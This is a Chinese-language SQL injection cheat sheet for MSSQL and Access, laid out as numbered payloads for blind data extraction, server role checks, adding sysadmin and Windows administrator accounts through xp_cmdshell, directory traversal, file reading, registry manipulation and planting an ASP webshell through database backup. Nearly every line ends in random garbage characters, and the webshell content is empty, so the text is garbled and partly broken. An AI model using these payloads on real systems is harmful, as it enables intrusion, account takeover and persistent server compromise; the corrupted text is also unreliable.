1.判断是否有注入;and 1=1 ;and 1=2 f�!7fz~&Sh
2.初步判断是否是mssql ;and user>0 5/hgWG6.�t
r{�*��Qsaw
3.注入参数是字符'and [查询条件] and ''=' bz1`f�>%�l
'Q*��.[aJt
4.搜索时没过滤参数的'and [查询条件] and '%25'=' lNe5{'OrO�
�uKY1AC__
5.判断数据库系统 L{�ej<0�yr
IM,d6l�N6s
;and (select count(*) from sysobjects)>0 mssql s�4Jy�96<�
W� T @XHwt
;and (select count(*) from msysobjects)>0 access 4�U�$M0 =�
OHY|��< &*
�\"I418T K
9���q�q6P!
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ;�5|d[r}k3
p;%5��o0{1
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �ow+_g� R-
D3tcwjXoW_
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $;";i��:H`
O*F=�� x�G
9.(1)猜字段的ascii值(access) �N+]H�J�`K
k/U�rz��*O
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 F�rRUAoF�O
N5MWMN[6aP
(2)猜字段的ascii值(mssql) 2�9z�@� �!
XB[EJG�a�X
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =OrV��aZ0�
DLq'V�.�M:
10.测试权限结构(mssql) .5�~3D97X&
Eg4&D4TG�p
�nh+�h3"-d
I�x�@n�Rc'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Dz$dJF1�
8
"-�HWw?rx/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {�p$X*2ReB
4y��)6��!p
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 16i�p�:/5�
�>qMz�Qw2�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- &�`'@}o>2�
?wIw$p�>wT
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- wgQx.8 h>�
�6/�0bis
H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �=FAIbM�>u
+wEs�fYW��
;and 1=(select IS_MEMBER('db_owner'));-- Tj2�p�EO�u
f�G@]��G9Z
��]�P_yN:~
#�#�"�
Hui
11.添加mssql和系统的帐户 ��h5n@SE>G
��_Go�FwVO
;exec master.dbo.sp_addlogin username;-- T�0��o0�_R
;exec master.dbo.sp_password null,username,password;-- ��,{'ZP��_
^C2SLLgeJ�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 7?y(�[i\y
�q:wz!~(�>
;exec master.dbo.xp_cmdshell 'net user username password (AG(�(eV��
&jr����c�]
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7a4�Z~r27/
�8q���UNh#
;exec master.dbo.xp_cmdshell 'net user username password /add';-- t#!AfTY$w
.|�:R�#V�W
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 4�`�sW_
ks
�kb\\F:w(W
IR8qF��WDZ
2�%-�/}'G*
12.(1)遍历目录 /RF&@NJE5�
F:Yp1Wrb�<
;create table dirs(paths varchar(100), id int) k]c$SzJ>�/
'kJyE9*xU.
;insert dirs exec master.dbo.xp_dirtree 'c:\' K7,Sr1�O `
I�#(?x�Hx
;and (select top 1 paths from dirs)>0 K�:$G�mV9o
3�m�y_Gp�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0.�~�s>xXp
E,���/n�K
!�H z�J*�
2\�"���T&�
(2)遍历目录 =N��z;R2{@
[KEw5�-=i@
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;IT'�6m`@W
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 :?�g�p�}.�
t&o&�g��b
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %y+v0.aWH+
=>e>�
r~cW
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +[V.yY/t|>
"i%=Q�ON`�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 HC�$}KoZkC
�,C^u8Z|�T
Z>.(���'��
Ki[&DvW�:�
13.mssql中的存储过程 X|Nb8�1�M
C jz(-0�18
xp_regenumvalues 注册表根键, 子键 n�K�ch��:g
���6"2�I�V
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 8&y#LeM1TT
<,t6A?YoMP
xp_regread 根键,子键,键值名 Go7� o�j'"
( n!8>>+1C
;exec xp_regread 5�QG?*Z~?7
i&L!?6 5-f
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 wYd{X� 8�$
xeRoif\4c
xp_regwrite 根键,子键, 值名, 值类型, 值 SM.KM�_%K�
:>3?�|Z"Aj
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ZkF�6AF� �
\
Ju�7.3.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 P��SU}�fo�
}4q1�"iMlO
xp_regdeletevalue 根键,子键,值名 N3\�vd_D(
�vSo�,,~�F
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��nz/cs n�
nR,QqIFFw
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �g�7v(�g?�
�(J.U�{N v
�=AX��"'q�
j^m�p�kv<P
14.mssql的backup创建webshell \|��
'Yuh
,a�"�:/ /[
use model @h%�Nn)QBq
V�?n=y��g�
create table cmd(str image); 7J|nqr`�>t
? RI�D4xu!
insert into cmd(str) values (''); Ime��"�}*9
d����M;v39
backup database model to disk='c:\l.asp'; ]9�}^}U1."
/Uni6O�)oc
tPFj[Y~Iy
eI/�5f��oA
15.mssql内置函数 vS�wRj<|CF
(~?p`g+I.P
;and (select @@version)>0 获得Windows的版本号 "6i3�'jc`
OgCz[QXr_�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �*~`BG�5w�
Ed1y%mR�>�
;and (select user_name())>0 爆当前系统的连接用户 O_��v*,L!�
UYhxg�PGsj
;and (select db_name())>0 得到当前连接的数据库 1P G"�IaOb
5jsZ��Jpk$
wB"`�lY���
C��/��q�!!
16.简洁的webshell ��Fm[3B�tn
wT���+\:y�
use model M��AL;XcRR
fN6n2*w�r(
create table cmd(str image); ,k}(�]{� -
aq�v'c�
j>
insert into cmd(str) values (''); Q6xA@"�GJ
��[$����z-
backup database model to disk='g:\wwwtest\l.asp';
